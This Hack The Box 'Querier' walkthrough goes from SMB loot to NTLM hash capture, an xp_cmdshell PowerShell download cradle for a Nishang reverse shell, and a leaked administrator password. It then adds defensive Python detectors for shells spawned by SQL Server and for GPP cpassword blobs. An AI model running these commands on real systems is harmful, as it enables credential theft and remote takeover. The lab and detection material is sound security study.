HTB – Querier Walkthrough


SMB Shares

Get the file and unzip it

SQL credentials found in vbaProject.bin

Use Impacket's mssqlclient script to log in

Try to enable xp_cmdshell, but the current user is not privileged

Try to steal credentials by making SQL Server connect to a fake share on your own box

Listen with Responder

Crack the hash with john

Log in again as the new user: mssql-svc@ -db volume -windows-auth

Enable xp_cmdshell, and now we have RCE

Host the Nishang reverse shell script on your own box and download it from the target with a PowerShell command to get a reverse shell.
Add the following command at the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress -Port 4444

Now execute the command on MSSQL to get a reverse shell:
EXEC xp_cmdshell 'powershell iex(new-object net.webclient).downloadstring("")'
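The xp_cmdshell step above has a distinctive footprint on the host: the SQL Server engine (sqlservr.exe) spawns cmd.exe, which launches PowerShell with a download cradle. The following detection logic is an added example written for this walkthrough, not code from the box or from any tool it names; it runs over constructed process-creation records (Sysmon Event ID 1 / Windows 4688 style fields) and the URL in them is a placeholder.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 / 4688 style fields).
# These are NOT logs from the box. Entries 1 and 2 model what xp_cmdshell produces:
# sqlservr.exe spawns cmd.exe, which launches PowerShell with a download cradle.
# Entry 3 is xp_cmdshell running a harmless command, which is still worth a finding.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe C:\\temp\\notes.txt"},
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c powershell iex(new-object net.webclient).downloadstring("http://placeholder.invalid/rev.ps1")'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell iex(new-object net.webclient).downloadstring("http://placeholder.invalid/rev.ps1")'},
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir C:\\backups"},
]

# Child images that are suspicious when the parent is the SQL Server engine.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Download-cradle fragments: one alone is weak evidence, two or more together are strong.
CRADLE_PATTERNS = [
    re.compile(r"net\.webclient", re.I),
    re.compile(r"downloadstring|downloadfile", re.I),
    re.compile(r"\biex\b|invoke-expression", re.I),
]


def basename(path):
    """Return the lower-cased file name of a Windows path (either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return one finding dict per rule hit: which event index fired which rule."""
    findings = []
    for idx, ev in enumerate(events):
        parent = basename(ev["ParentImage"])
        image = basename(ev["Image"])
        cmdline = ev["CommandLine"]
        # Rule 1: the database engine should never be launching a shell.
        if parent == "sqlservr.exe" and image in SHELL_IMAGES:
            findings.append({"event": idx, "rule": "sqlservr_spawns_shell",
                             "detail": cmdline})
        # Rule 2: a PowerShell download cradle anywhere in the command line.
        hits = [p.pattern for p in CRADLE_PATTERNS if p.search(cmdline)]
        if len(hits) >= 2:
            findings.append({"event": idx, "rule": "powershell_download_cradle",
                             "detail": ", ".join(hits)})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['rule']} ({f['detail']})")
```

Rule 1 fires on the harmless `dir` as well, by design: any shell under sqlservr.exe means xp_cmdshell (or something equivalent) is in use, and on a host where it is supposed to be disabled that alone is the alert. Disabling xp_cmdshell with sp_configure and keeping the SQL service account off local admin removes the path this walkthrough takes.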

Privilege Escalation
Get the PowerUp.ps1 script onto your own box:
wget
Then send it to the Windows box:
Invoke-WebRequest -OutFile c:\users\mssql-svc\downloads\PowerUp.ps1

Run the script:
Import-Module .\PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecks

It gives us clear-text credentials from the GPP cache: Administrator:'MyUnclesAreMarioAndLuigi!!1!'@
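The credential PowerUp finds comes from a Group Policy Preferences XML file that still carries a cpassword attribute (the pre-MS14-025 way of setting passwords through GPP). A defender can audit for this without decrypting anything, since any non-empty cpassword is a finding in itself. The script below is an added example for this walkthrough, not PowerUp's or the box's code; the Groups.xml sample is constructed, the cpassword value is a placeholder, and the set of GPP file names and account attributes it looks at is the commonly documented set rather than an exhaustive one.

```python
import os
import sys
import xml.etree.ElementTree as ET

# GPP preference files that can carry a cpassword attribute (commonly documented set).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

# Attribute names the different GPP files use for the account the password belongs to.
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs", "name")

# Constructed Groups.xml in the shape GPP writes. The cpassword value is a placeholder,
# not a real encrypted blob; the second user has an empty cpassword, the third has none.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator" changed="2019-01-01 00:00:00">
    <Properties action="U" userName="Administrator" cpassword="CONSTRUCTED_CPASSWORD_BLOB" neverExpires="1"/>
  </User>
  <User name="helpdesk" changed="2019-01-01 00:00:00">
    <Properties action="C" userName="helpdesk" cpassword=""/>
  </User>
  <User name="auditor" changed="2019-01-01 00:00:00">
    <Properties action="D" userName="auditor"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element with a non-empty cpassword attribute.

    The blob is never decoded; its presence is the exposure, because the AES key
    GPP used for it is public. Only the length is reported so findings stay safe to share.
    """
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [{"source": source, "error": str(exc)}]
    findings = []
    for elem in root.iter():
        cpw = elem.attrib.get("cpassword")
        if not cpw:  # missing or empty attribute: nothing stored
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "?")
        findings.append({"source": source, "element": elem.tag,
                         "account": account, "cpassword_len": len(cpw)})
    return findings


def scan_directory(root):
    """Walk a SYSVOL copy or a local Group Policy history cache and audit every GPP file."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower() in GPP_FILES:
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8-sig", errors="replace") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
    return findings


if __name__ == "__main__":
    # With a path argument, audit that tree; otherwise show the constructed sample.
    results = scan_directory(sys.argv[1]) if len(sys.argv) > 1 else \
        find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml (constructed)")
    for r in results:
        print(r)
```

Point it at the domain's SYSVOL Policies tree (or at the local history cache under C:\ProgramData\Microsoft\Group Policy\History, which is where the cached copy on a member host lives) to find every preference that still embeds a password. The fix is to delete the preference item and rotate the account it names; patching alone does not remove blobs that are already in SYSVOL.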

